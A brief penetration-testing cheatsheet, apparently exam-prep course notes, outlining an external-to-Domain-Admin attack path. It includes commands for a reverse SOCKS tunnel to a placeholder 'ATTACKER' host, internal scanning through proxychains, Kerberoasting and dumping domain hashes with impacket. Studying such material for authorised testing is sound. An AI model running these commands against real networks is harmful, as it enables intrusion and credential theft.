Attacking Enterprise Networks
Fundamentals
Overview
Simulated real-world penetration test combining all skills - External to Internal to Domain Admin.
Cheatsheet
Attack Path Overview
- External Recon: Subdomain enum, OSINT
- Initial Access: Web exploit, phishing
- Internal Pivot: Tunnel to internal network
- AD Compromise: Kerberoast, credential reuse
- Domain Admin: DCSync, Golden Ticket
External to Internal
# Gain foothold via web app
# Set up pivot
chisel client ATTACKER:8000 R:socks    # Establish SOCKS tunnel
# Scan internal
proxychains nmap -sT 172.16.0.0/24     # Scan internal network via proxy
AD Takeover
GetUserSPNs.py domain/user -dc-ip DC_IP -request    # Kerberoast
impacket-secretsdump domain/admin@DC_IP             # Dump domain hashes
Command Examples
Common Pitfalls
- Getting tunnel vision on one attack path
- Not maintaining access/persistence
- Rushing and missing enumeration
Exam Survival Tips
- This is the exam simulation - practice it!
- Time management is critical
- Have backup attack plans ready
- Document everything for the report